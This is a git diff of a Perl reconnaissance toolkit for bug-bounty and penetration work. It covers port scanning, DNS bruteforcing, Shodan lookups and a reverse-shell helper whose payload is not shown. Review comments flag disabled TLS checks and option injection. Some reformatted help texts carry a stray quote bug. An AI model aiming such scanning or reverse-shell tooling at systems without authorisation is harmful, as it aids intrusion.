@result; } if ($help) { - return " - \rHelper::Generate_UUID - \r===================== - \r-h, --help See this menu - \r-v, --version Version of UUID algorithm - \r-r, --repeat Quantities of repetitions\n\n"; + return<<"EOT"; + +Helper::Generate_UUID +===================== +-h, --help See this menu +-v, --version Version of UUID algorithm +-r, --repeat Quantities of repetitions\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Host_Normalization.pm b/lib/Spellbook/Helper/Host_Normalization.pm index a786063..cf234e4 100644 --- a/lib/Spellbook/Helper/Host_Normalization.pm +++ b/lib/Spellbook/Helper/Host_Normalization.pm 
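Review bot: `Net::IP->new($range)` and `Net::IP->new($ip)` return undef for input they cannot parse, and the ranges come from JSON downloaded at run time. One malformed entry therefore makes `$cdn_range->overlaps($target_ip)` die on an undefined value. I would add `return 0 unless $target_ip;` right after it is built and `next unless $cdn_range;` directly after `Net::IP->new($range)`. `decode_json` also throws on a truncated or non-JSON body, so the `code == 200` test alone does not make the parse safe; an `eval` around the decode that returns 0 on failure would match the other early returns.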
@@ -14,7 +14,7 @@ package Spellbook::Helper::Host_Normalization { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -34,11 +34,14 @@ package Spellbook::Helper::Host_Normalization { } if ($help) { - return " - \rHelper::Host_Normalization - \r========================== - \r-h, --help See this menu - \r-t, --target Define a target to normalize\n\n"; + return<<"EOT"; + +Helper::Host_Normalization +========================== +-h, --help See this menu +-t, --target Define a target to normalize\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Permutations.pm b/lib/Spellbook/Helper/Permutations.pm index cc615cd..1344ab5 100644 --- a/lib/Spellbook/Helper/Permutations.pm +++ b/lib/Spellbook/Helper/Permutations.pm @@ -25,20 +25,23 @@ package Spellbook::Helper::Permutations { $chars[$i] = $chars[$random]; $chars[$random] = $temp; } - + push @result, join("", @chars); } - - return @result; + + return @result; } if ($help) { - return " - \rHelper::Permutations - \r===================== - \r-h, --help See this menu - \r-v, --value Provide a seed - \r-r, --repeat Quantities of repetitions\n\n"; + return<<"EOT"; + +Helper::Permutations +===================== +-h, --help See this menu +-v, --value Provide a seed +-r, --repeat Quantities of repetitions\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Read_File.pm b/lib/Spellbook/Helper/Read_File.pm index a0c7ac8..cc39cba 100644 --- a/lib/Spellbook/Helper/Read_File.pm +++ b/lib/Spellbook/Helper/Read_File.pm @@ -2,12 +2,13 @@ package Spellbook::Helper::Read_File { use strict; use warnings; use Spellbook::Core::Module; + use Carp qw(croak); sub new { - my ($self, $parameters)= @_; + my ($self, $parameters) = @_; my ($help, $file, $entrypoint, @result); - Getopt::Long::GetOptionsFromArray ( + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "f|file=s" => \$file, 
@@ -15,36 +16,36 @@ package Spellbook::Helper::Read_File { ); if ($file) { - open (my $filename, "<", $file); + local $/ = "\n"; + open my $fh, "<", $file or croak "Failed to open file: $!"; + my @lines = <$fh>; + close $fh; - while (<$filename>) { - chomp ($_); + for my $line (@lines) { + chomp($line); if ($entrypoint) { - my $return = Spellbook::Core::Module -> new ($entrypoint, ["--target" => $_]); - + my $return = Spellbook::Core::Module->new($entrypoint, ["--target" => $line]); if ($return) { - push @result, $_; + push @result, $line; } } - else { - push @result, $_; + push @result, $line; } } - - close ($filename); - return @result; } - - return " - \rHelper::Read_File - \r===================== - \r-h, --help See this menu - \r-f, --file Define a file to read - \r-e, --entrypoint Set a other module to send the output\n\n"; + return <<"EOT"; + +Helper::Read_File +===================== +-h, --help See this menu +-f, --file Define a file to read +-e, --entrypoint Set a other module to send the output + +EOT } } diff --git a/lib/Spellbook/Helper/Reverse_Shell.pm b/lib/Spellbook/Helper/Reverse_Shell.pm index 5e7c3ae..e5a22d1 100644 --- a/lib/Spellbook/Helper/Reverse_Shell.pm +++ b/lib/Spellbook/Helper/Reverse_Shell.pm @@ -6,7 +6,7 @@ package Spellbook::Helper::Reverse_Shell { sub new { my ($self, $parameters) = @_; my ($help, $target); - + my $port = 1337; my $lang = "perl"; 
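Review bot: `my @lines = <$fh>;` reads the whole input file into memory before any line is processed, where the loop it replaces streamed it. With a large wordlist and an `--entrypoint` module called per line, that is an avoidable peak. `while (my $line = <$fh>) { chomp $line; ... }` with `close $fh;` after the loop keeps the new lexical handle and the `croak` on a failed `open` without the slurp. A failed `open` now throws where it was previously unchecked, so any caller that expects a plain return value for a missing file would need to catch it. The `sub new` header is in the previous hunk.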
@@ -28,15 +28,18 @@ package Spellbook::Helper::Reverse_Shell { } if ($help) { - return " - \rHelper::Reverse_Shell - \r===================== - \r-h, --help See this menu - \r-t, --target Set your IP/Host to send the reverse shell - \r-p, --port Define a port to connect - \r-l, --lang Default is perl, types avaible: perl, bash\n\n"; + return<<"EOT"; + +Helper::Reverse_Shell +===================== +-h, --help See this menu +-t, --target Set your IP/Host to send the reverse shell +-p, --port Define a port to connect +-l, --lang Default is perl, types avaible: perl, bash\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Helper/Scope.pm b/lib/Spellbook/Helper/Scope.pm index 79de620..4320c8d 100644 --- a/lib/Spellbook/Helper/Scope.pm +++ b/lib/Spellbook/Helper/Scope.pm @@ -42,16 +42,16 @@ package Spellbook::Helper::Scope { push @results, $info; } } - + if ($save) { if ($keep && exists $yamlfile->[0]->{$save}) { push @{$yamlfile->[0]->{$save}}, @results; } - + else { $yamlfile->[0]->{$save} = [@results]; } - + $yamlfile->write($scope); } @@ -59,17 +59,20 @@ package Spellbook::Helper::Scope { } if ($help) { - return " - \rHelper::Scope - \r===================== - \r-h, --help See this menu - \r-S, --scope Define a YML file as a scope - \r-i, --information Set an information to extract from your scope - \r-e, --entrypoint Send informations to another entrypoint module - \r-K, --keep Keep the current values in the file and add news values - \r--save Save the output on some attribute\n\n"; + return<<"EOT"; + +Helper::Scope +===================== +-h, --help See this menu +-S, --scope Define a YML file as a scope +-i, --information Set an information to extract from your scope +-e, --entrypoint Send informations to another entrypoint module +-K, --keep Keep the current values in the file and add news values +--save Save the output on some attribute\n\n"; + +EOT } - + return 0; } } 
diff --git a/lib/Spellbook/Helper/Uniq.pm b/lib/Spellbook/Helper/Uniq.pm index d4f81a2..7541696 100644 --- a/lib/Spellbook/Helper/Uniq.pm +++ b/lib/Spellbook/Helper/Uniq.pm @@ -17,11 +17,14 @@ package Spellbook::Helper::Uniq { } if ($help) { - return " - \rHelper::Uniq - \r===================== - \r-h, --help See this menu - \r-v, --target Define a value\n\n"; + return<<"EOT"; + +Helper::Uniq +===================== +-h, --help See this menu +-v, --target Define a value\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Nmap.pm b/lib/Spellbook/Parser/Nmap.pm index 6127b7b..2f464f0 100644 --- a/lib/Spellbook/Parser/Nmap.pm +++ b/lib/Spellbook/Parser/Nmap.pm @@ -2,7 +2,7 @@ package Spellbook::Parser::Nmap { use strict; use warnings; use XML::Simple; - + # https://metacpan.org/pod/Nmap::Parser sub new { @@ -18,14 +18,14 @@ package Spellbook::Parser::Nmap { if ($file) { my $xml = XML::Simple -> new(); my $data = $xml -> XMLin($file); - + my $host = $data -> {host} -> {address} -> {addr}; - + # foreach my $content (@{$data -> {host} -> {ports} -> {port}}) { # print Dumper($content); # push @result, $element -> {Key}; # } - + # my $state = $content -> {state} -> {state}; # if (($state eq "open") || ($state eq "filtered")) { @@ -36,16 +36,19 @@ package Spellbook::Parser::Nmap { # push @results, "$host -> [$protocol] | [$state]-> $port \t | $service\n"; # } # }; - + return @results; } if ($help) { - return " - \rParser::Nmap - \r===================== - \r-h, --help See this menu - \r-f, --file Set an XML file from Nmap output\n\n"; + return<<"EOT"; + +Parser::Nmap +===================== +-h, --help See this menu +-f, --file Set an XML file from Nmap output\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Nozaki.pm b/lib/Spellbook/Parser/Nozaki.pm index 36f9551..fed200a 100644 --- a/lib/Spellbook/Parser/Nozaki.pm +++ b/lib/Spellbook/Parser/Nozaki.pm 
@@ -25,11 +25,14 @@ package Spellbook::Parser::Nozaki { } if ($help) { - return " - \rParser::Nozaki - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Nozaki +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/S3_Bucket.pm b/lib/Spellbook/Parser/S3_Bucket.pm index acdd4aa..16288ba 100644 --- a/lib/Spellbook/Parser/S3_Bucket.pm +++ b/lib/Spellbook/Parser/S3_Bucket.pm @@ -16,10 +16,10 @@ package Spellbook::Parser::S3_Bucket { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; + if ($target !~ /^http(?:s)?:\/\//x) { + $target = "https://$target"; } - + if ($target !~ /\/$/x) { $target .= "/"; } my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -35,16 +35,19 @@ package Spellbook::Parser::S3_Bucket { } } } - + return @result; } if ($help) { - return " - \rParser::Bucket - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Bucket +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Sitemap.pm b/lib/Spellbook/Parser/Sitemap.pm index 8ffb154..48c2ad7 100644 --- a/lib/Spellbook/Parser/Sitemap.pm +++ b/lib/Spellbook/Parser/Sitemap.pm @@ -15,7 +15,7 @@ package Spellbook::Parser::Sitemap { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } if ($target !~ /\/sitemap.xml$/x) { $target = "$target/sitemap.xml"; } my $userAgent = Spellbook::Core::UserAgent -> new(); 
@@ -33,16 +33,19 @@ package Spellbook::Parser::Sitemap { } } } - + return @result; } if ($help) { - return " - \rParser::Sitemap - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Sitemap +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Platform/HackerOne.pm b/lib/Spellbook/Platform/HackerOne.pm index 003a6a6..739fa84 100644 --- a/lib/Spellbook/Platform/HackerOne.pm +++ b/lib/Spellbook/Platform/HackerOne.pm @@ -18,7 +18,7 @@ package Spellbook::Platform::HackerOne { ); my $token = Spellbook::Core::Credentials -> new(["--platform" => "hackerone"]); - + if ($token && $target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $api_url = "https://api.hackerone.com/v1/hackers/programs/$target"; @@ -35,7 +35,7 @@ package Spellbook::Platform::HackerOne { for my $scope (@{$data -> {"relationships"} -> {"structured_scopes"} -> {"data"}}) { if (($scope -> {"attributes"} -> {"asset_type"} eq "URL") && ($scope -> {"attributes"} -> {"eligible_for_bounty"})) { my $url = $scope -> {"attributes"} -> {"asset_identifier"}; - + push @result, Spellbook::Helper::Host_Normalization -> new(["--target" => $url]); } } @@ -45,15 +45,18 @@ package Spellbook::Platform::HackerOne { } if ($help) { - return " - \rPlatform::HackerOne - \r===================== - \r-h, --help See this menu - \r-t, --target Program handle from HackerOne\n\n"; + return<<"EOT"; + +Platform::HackerOne +===================== +-h, --help See this menu +-t, --target Program handle from HackerOne\n\n"; + +EOT } return 0; } -} +} 1; \ No newline at end of file diff --git a/lib/Spellbook/Platform/Intigriti.pm b/lib/Spellbook/Platform/Intigriti.pm index 4db7ac1..8c049c3 100644 --- a/lib/Spellbook/Platform/Intigriti.pm +++ b/lib/Spellbook/Platform/Intigriti.pm 
@@ -5,10 +5,13 @@ package Spellbook::Platform::Intigriti { sub new { my ($self, $parameters) = @_; - return " - \rPlatform::Intigriti - \r=================== - \rThis module is under development\n\n"; + return<<"EOT"; + +Platform::Intigriti +=================== +This module is under development\n\n"; + +EOT } } diff --git a/lib/Spellbook/Recon/DNS_Bruteforce.pm b/lib/Spellbook/Recon/DNS_Bruteforce.pm index 22c74f0..34d3a1c 100644 --- a/lib/Spellbook/Recon/DNS_Bruteforce.pm +++ b/lib/Spellbook/Recon/DNS_Bruteforce.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::DNS_Bruteforce { if (@file) { foreach my $line (@file) { my $return = Spellbook::Recon::Host_Resolv -> new (["--target" => "$line.$target"]); - + if ($return) { push @result, "$line.$target"; } @@ -31,14 +31,17 @@ package Spellbook::Recon::DNS_Bruteforce { return @result; } - + if ($help) { - return " - \rRecon::DNS_Bruteforce - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain as a target - \r-f, --file Define a wordlist\n\n"; + return<<"EOT"; + +Recon::DNS_Bruteforce +===================== +-h, --help See this menu +-t, --target Set a domain as a target +-f, --file Define a wordlist\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Detect_Error.pm b/lib/Spellbook/Recon/Detect_Error.pm index 56ce245..987405d 100644 --- a/lib/Spellbook/Recon/Detect_Error.pm +++ b/lib/Spellbook/Recon/Detect_Error.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Detect_Error { if ($target) { $target =~ s/^http(s)?:\/\///x; - + my $resolv = Net::DNS::Resolver -> new(); my $reply = $resolv -> search($target); @@ -30,7 +30,7 @@ package Spellbook::Recon::Detect_Error { if ($request -> code() == 404) { push @results, $target; - } + } } } } 
@@ -39,11 +39,14 @@ package Spellbook::Recon::Detect_Error { } if ($help) { - return " - \rChecker - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Checker +============== +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } } } diff --git a/lib/Spellbook/Recon/Dorking.pm b/lib/Spellbook/Recon/Dorking.pm index a3bbd8a..1302d64 100644 --- a/lib/Spellbook/Recon/Dorking.pm +++ b/lib/Spellbook/Recon/Dorking.pm @@ -20,11 +20,13 @@ package Spellbook::Recon::Dorking { } if ($help) { - return " - \rRecon::Dorking - \r===================== - \r-h, --help See this menu - \r \n\n"; + return<<"EOT"; + +Recon::Dorking +===================== +-h, --help See this menu\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Extract_Links.pm b/lib/Spellbook/Recon/Extract_Links.pm index 3fb8bde..46b6c1a 100755 --- a/lib/Spellbook/Recon/Extract_Links.pm +++ b/lib/Spellbook/Recon/Extract_Links.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::Extract_Links { ssl_opts => { verify_hostname => 0 } ); - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -30,12 +30,12 @@ package Spellbook::Recon::Extract_Links { my $request = $mech -> get($target); my @links = $mech -> links(); - + for my $link (@links) { my $url = $link -> url(); - if (($url) && ($url !~ m/#/x) && ($url !~ /^http(s)?:\/\//x)) { - if ($url !~ /^\//x) { + if (($url) && ($url !~ m/#/x) && ($url !~ /^http(?:s)?:\/\//x)) { + if ($url !~ /^\//x) { $url = "/" . $url; } 
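Review bot: The constructor options kept as context in the `@@ -22,7 +22,7 @@` hunk of Extract_Links.pm include `ssl_opts => { verify_hostname => 0 }`, which turns off TLS hostname verification for the pages this module fetches. The extracted links can then come from whoever answers on the network path rather than from the intended host. Unless this is needed for hosts with broken certificates, I would drop the option or put it behind an explicit flag. If it stays, a comment such as `# hostname verification disabled on purpose; results are not authenticated` would record the trade-off. The constructor call starts above the hunk, so its other options are not visible here.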
@@ -57,12 +57,15 @@ package Spellbook::Recon::Extract_Links { } if ($help) { - return " - \rRecon::Extrac_Links - \r===================== - \r-h, --help See this menu - \r-t, --target Define a web page to extract all links - \r-d, --deep Draft recursive function\n\n"; + return<<"EOT"; + +Recon::Extrac_Links +===================== +-h, --help See this menu +-t, --target Define a web page to extract all links +-d, --deep Draft recursive function\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Find_Emails.pm b/lib/Spellbook/Recon/Find_Emails.pm index f1d9a38..21674e0 100644 --- a/lib/Spellbook/Recon/Find_Emails.pm +++ b/lib/Spellbook/Recon/Find_Emails.pm @@ -30,15 +30,18 @@ package Spellbook::Recon::Find_Emails { } return @result; - } + } } if ($help) { - return " - \rRecon::Find_Emails - \r===================== - \r-h, --help See this menu - \r-t, --target Define a domain to find emails\n"; + return<<"EOT"; + +Recon::Find_Emails +===================== +-h, --help See this menu +-t, --target Define a domain to find emails\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Get_IP.pm b/lib/Spellbook/Recon/Get_IP.pm index e6eb2ad..e3f8533 100644 --- a/lib/Spellbook/Recon/Get_IP.pm +++ b/lib/Spellbook/Recon/Get_IP.pm @@ -22,15 +22,18 @@ package Spellbook::Recon::Get_IP { if ($ip) { return inet_ntoa($ip); - } + } } if ($help) { - return " - \rRecon::Get_IP - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Get_IP +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/HTTP_Probe.pm b/lib/Spellbook/Recon/HTTP_Probe.pm index 49e9467..ee5e606 100644 --- a/lib/Spellbook/Recon/HTTP_Probe.pm +++ b/lib/Spellbook/Recon/HTTP_Probe.pm 
@@ -14,14 +14,14 @@ package Spellbook::Recon::HTTP_Probe { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $response = $userAgent -> get($target); - if ($response -> code() != 500) { + if ($response -> code() != 500) { push @result, $target; } @@ -29,11 +29,14 @@ package Spellbook::Recon::HTTP_Probe { } if ($help) { - return " - \rRecon::HTTP_Probe - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target to make a HTTP request probe\n\n"; + return<<"EOT"; + +Recon::HTTP_Probe +===================== +-h, --help See this menu +-t, --target Define a target to make a HTTP request probe\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/HaveBeenPwned.pm b/lib/Spellbook/Recon/HaveBeenPwned.pm index b2c5adf..1621406 100644 --- a/lib/Spellbook/Recon/HaveBeenPwned.pm +++ b/lib/Spellbook/Recon/HaveBeenPwned.pm @@ -6,7 +6,7 @@ package Spellbook::Recon::HaveBeenPwned { use Spellbook::Core::Credentials; # THIS IS A DRAFT MODULE - + sub new { my ($self, $parameters) = @_; my ($help, $target); @@ -33,11 +33,14 @@ package Spellbook::Recon::HaveBeenPwned { } if ($help) { - return " - \rRecon::HaveBeenPwned - \r==================== - \r-h, --help See this menu - \r-e, --target Define an e-mail address as a target\n\n"; + return<<"EOT"; + +Recon::HaveBeenPwned +==================== +-h, --help See this menu +-e, --target Define an e-mail address as a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Host_Resolv.pm b/lib/Spellbook/Recon/Host_Resolv.pm index 7a79ac0..8de4dde 100644 --- a/lib/Spellbook/Recon/Host_Resolv.pm +++ b/lib/Spellbook/Recon/Host_Resolv.pm 
@@ -23,15 +23,18 @@ package Spellbook::Recon::Host_Resolv { if ($search) { return $target; - } + } } - + if ($help) { - return " - \rRecon::Host_Resolv - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Host_Resolv +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Internal_DNS.pm b/lib/Spellbook/Recon/Internal_DNS.pm index 9dabb96..79a3622 100644 --- a/lib/Spellbook/Recon/Internal_DNS.pm +++ b/lib/Spellbook/Recon/Internal_DNS.pm @@ -26,11 +26,14 @@ package Spellbook::Recon::Internal_DNS { } if ($help) { - return " - \rRecon::Internal_DNS - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Internal_DNS +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Masscan.pm b/lib/Spellbook/Recon/Masscan.pm index 205742c..d460388 100644 --- a/lib/Spellbook/Recon/Masscan.pm +++ b/lib/Spellbook/Recon/Masscan.pm @@ -5,11 +5,11 @@ package Spellbook::Recon::Masscan { use List::MoreUtils qw(uniq); use Spellbook::Recon::Get_IP; use Spellbook::Helper::CDN_Checker; - + sub new { my ($self, $parameters) = @_; my ($help, @target, @ports, @result, $skip_cdn); - + my @arguments = qw(--banners); Getopt::Long::GetOptionsFromArray ( @@ -19,7 +19,7 @@ package Spellbook::Recon::Masscan { "p|port=s" => \@ports, "a|arguments" => \@arguments, "skip-cdn" => \$skip_cdn - ); + ); if (@target) { if (!@ports) { @ports = "1-65535"; } @@ -28,7 +28,7 @@ package Spellbook::Recon::Masscan { my $CDN_Checker = Spellbook::Helper::CDN_Checker -> new (["--target" => $target[0]]); if ($CDN_Checker) { - return 0; + return 0; } } 
@@ -45,23 +45,26 @@ package Spellbook::Recon::Masscan { if ($scan) { my $result = $masscan -> scan_results(); - foreach my $value (@{$result -> {"scan_results"}}) { + foreach my $value (@{$result -> {"scan_results"}}) { push @result, $target[0] . ":" . $value -> {"ports"} -> [0] -> {"port"}; } - + return uniq @result; } - } + } if ($help) { - return " - \rRecon::Masscan - \r===================== - \r-h, --help See this menu - \r-t, --target Set an Domain/IP to make a port scanning using masscan - \r-p, --ports Define ports to scan - \r-a, --arguments Parameters to masscanner - \r--skip-cdn Skip the CDN check\n\n"; + return<<"EOT"; + +Recon::Masscan +===================== +-h, --help See this menu +-t, --target Set an Domain/IP to make a port scanning using masscan +-p, --ports Define ports to scan +-a, --arguments Parameters to masscanner +--skip-cdn Skip the CDN check\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Nmap_Scanner.pm b/lib/Spellbook/Recon/Nmap_Scanner.pm index 23ea636..15278ad 100644 --- a/lib/Spellbook/Recon/Nmap_Scanner.pm +++ b/lib/Spellbook/Recon/Nmap_Scanner.pm @@ -2,28 +2,28 @@ package Spellbook::Recon::Nmap_Scanner { use strict; use warnings; use Nmap::Scanner; # https://metacpan.org/pod/Nmap::Scanner - + sub scan_started { my $self = shift; my $host = shift; - + my $hostname = $host -> hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); my $status = $host -> status(); - + print "$hostname ($addresses) is $status\n"; return 0; } - + sub port_found { my $self = shift; my $host = shift; my $port = shift; - + my $name = $host->hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); - + print "On host $name ($addresses), found ", $port->state()," port ", join('/', $port -> protocol(), $port -> portid()), "\n"; 
@@ -48,20 +48,23 @@ package Spellbook::Recon::Nmap_Scanner { $scanner -> register_scan_started_event(\&scan_started); $scanner -> register_port_found_event(\&port_found); $scanner -> scan("-sS -p 1-1024 -O $target"); - + my $results = $scanner -> scan(); # print Dumper($results); return @result; - } + } if ($help) { - return " - \rRecon::Nmap_Scanner - \r===================== - \r-h, --help See this menu - \r-t, --target Set an IP to run the scanner\n\n"; + return<<"EOT"; + +Recon::Nmap_Scanner +===================== +-h, --help See this menu +-t, --target Set an IP to run the scanner\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Query_Shodan.pm b/lib/Spellbook/Recon/Query_Shodan.pm index b4453c2..0b109b0 100644 --- a/lib/Spellbook/Recon/Query_Shodan.pm +++ b/lib/Spellbook/Recon/Query_Shodan.pm @@ -24,7 +24,7 @@ package Spellbook::Recon::Query_Shodan { if ($httpCode == 200) { my $content = decode_json($request -> content()); - + foreach my $data (@{$content -> {"matches"}}) { my $hostname = $data -> {"ip_str"}; my $port = $data -> {"port"}; @@ -37,11 +37,14 @@ package Spellbook::Recon::Query_Shodan { } if ($help) { - return " - \rRecon::Shodan - \r===================== - \r-h, --help See this menu - \r-t, --query Define a query\n\n"; + return<<"EOT"; + +Recon::Shodan +===================== +-h, --help See this menu +-t, --query Define a query\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Shodan_Enumeration.pm b/lib/Spellbook/Recon/Shodan_Enumeration.pm index d8edb03..bd02dae 100644 --- a/lib/Spellbook/Recon/Shodan_Enumeration.pm +++ b/lib/Spellbook/Recon/Shodan_Enumeration.pm @@ -21,7 +21,7 @@ package Spellbook::Recon::Shodan_Enumeration { if ($target =~ /^http(s)?:\/\//x) { $target =~ s/^http(s)?:\/\///x; } - + my $validate = is_domain($target); if ($validate) { 
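Review bot: `$scanner -> scan("-sS -p 1-1024 -O $target");` splices the `--target` value straight into an option string, so a value containing whitespace or a leading `-` is read by nmap as extra options rather than as a host. The target should be checked before this call, e.g. `return 0 if $target !~ /\A[A-Za-z0-9][A-Za-z0-9.:-]*\z/;`. The hunk also shows a second `$scanner -> scan();` with no arguments whose result is only referenced by a commented-out dump, which looks like a leftover. `sub new` begins outside the hunk, so where `$target` is parsed is not visible here.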
@@ -61,11 +61,14 @@ package Spellbook::Recon::Shodan_Enumeration { } if ($help) { - return " - \rRecon::Shodan_Enum - \r===================== - \r-h, --help See this menu - \r-t, --target Set an IP to see infos on shodan API\n\n"; + return<<"EOT"; + +Recon::Shodan_Enum +===================== +-h, --help See this menu +-t, --target Set an IP to see infos on shodan API\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Subdomain_Enumeration.pm b/lib/Spellbook/Recon/Subdomain_Enumeration.pm index 1d06c66..2bcd126 100644 --- a/lib/Spellbook/Recon/Subdomain_Enumeration.pm +++ b/lib/Spellbook/Recon/Subdomain_Enumeration.pm @@ -5,7 +5,7 @@ package Spellbook::Recon::Subdomain_Enumeration { use List::MoreUtils qw(uniq); use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -50,14 +50,17 @@ package Spellbook::Recon::Subdomain_Enumeration { } return uniq @result; - } + } if ($help) { - return " - \rRecon::Subdomain_Enumeration - \r===================== - \r-h, --help See this menu - \r-t, --target Find subdomains from a target using SecurityTrails\n\n"; + return<<"EOT"; + +Recon::Subdomain_Enumeration +===================== +-h, --help See this menu +-t, --target Find subdomains from a target using SecurityTrails\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm index 0801727..1f411df 100644 --- a/lib/Spellbook/Recon/Technologies.pm +++ b/lib/Spellbook/Recon/Technologies.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Technologies { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } 
@@ -36,11 +36,14 @@ package Spellbook::Recon::Technologies { } if ($help) { - return " - \rRecon::Detect_Tech - \r===================== - \r-t, --target Define the target - \r-h, --help See this menu\n\n"; + return<<"EOT"; + +Recon::Detect_Tech +===================== +-t, --target Define the target +-h, --help See this menu\n\n"; + +EOT } return 1; diff --git a/lib/Spellbook/Recon/WayBackUrls.pm b/lib/Spellbook/Recon/WayBackUrls.pm index ffce702..d78d397 100644 --- a/lib/Spellbook/Recon/WayBackUrls.pm +++ b/lib/Spellbook/Recon/WayBackUrls.pm @@ -3,7 +3,7 @@ package Spellbook::Recon::WayBackUrls { use warnings; use JSON; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,11 +14,11 @@ package Spellbook::Recon::WayBackUrls { "t|target=s" => \$target ); - if ($target) { + if ($target) { my $endpoint = "http://web.archive.org/cdx/search/cdx?url=$target/*&output=json&collapse=urlkey"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get($endpoint); - + if (($request -> code() == 200) && ($request -> content ne "[]")) { my $content = decode_json($request -> content); @@ -33,11 +33,14 @@ package Spellbook::Recon::WayBackUrls { } if ($help) { - return " - \rRecon::WaybackUrls - \r===================== - \r-h, --help See this menu - \r-t, --target Set an website to see paths from WayBackMachine\n"; + return<<"EOT"; + +Recon::WaybackUrls +===================== +-h, --help See this menu +-t, --target Set an website to see paths from WayBackMachine\n"; + +EOT } return 0; diff --git a/spellbook.pl b/spellbook.pl index fcef7a0..b1792da 100755 --- a/spellbook.pl +++ b/spellbook.pl @@ -11,7 +11,7 @@ sub main { my ($search, $module, @result); - + Getopt::Long::GetOptions ( "s|search=s" => \$search, "m|module=s" => \$module @@ -25,6 +25,8 @@ sub main { } return Spellbook::Core::Helper -> new() unless $search || $module; + + return 0; } main(); \ No newline at end of file 
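Review bot: In the WayBackUrls hunk at `@@ -14,11 +14,11 @@` the CDX query is sent over plain `http://` and `$target` is interpolated into the `url=` parameter unescaped. That means the JSON handed to `decode_json` can be altered in transit, and a target containing `&` or `#` changes the query itself. Use `https://web.archive.org/cdx/search/cdx?...` and percent-encode the value before interpolation, for example with `URI::Escape::uri_escape`, which this file would need to load. `sub new` begins outside the hunk.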
From 73d718af2d1aa7e476cf8787651d2baa6ef8f978 Mon Sep 17 00:00:00 2001 
